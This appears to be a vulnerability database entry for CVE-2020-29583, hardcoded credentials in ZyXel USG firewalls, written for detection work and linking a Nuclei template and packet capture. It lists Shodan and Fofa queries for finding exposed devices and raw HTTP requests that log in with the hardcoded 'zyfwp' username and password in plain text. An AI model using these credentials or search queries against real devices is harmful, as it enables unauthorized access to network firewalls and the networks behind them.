| Title | ZyXel USG - Hardcoded Credentials |
|---|---|
| Author | canberbamber |
| Severity | Critical |
| Impact | An attacker can exploit this vulnerability to gain unauthorized access to the affected device, potentially leading to further compromise of the network. |
| Remediation | Update the firmware of the ZyXel USG device to the latest version, which addresses the hardcoded credentials issue. |
| CVSS Score | 9.8 |
| EPSS Score | 0.94367 |
| CVE ID | CVE-2020-29583 |
| CWE ID | CWE-522 |
| Shodan Query | title:"USG FLEX 100"http.title:"usg flex 100" |
| Fofa Query | title="usg flex 100" |
| Tags | cve cve2020 ftp-backdoor zyxel bypass kev vkev vuln |
A hardcoded credential vulnerability was identified in the ‘zyfwp’ user account in some Zyxel firewalls and AP controllers. The account was designed to deliver automatic firmware updates to connected access points through FTP.
GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.7 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
GET /ext-js/index.html HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-29583.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-29583.pcap
N/AN/A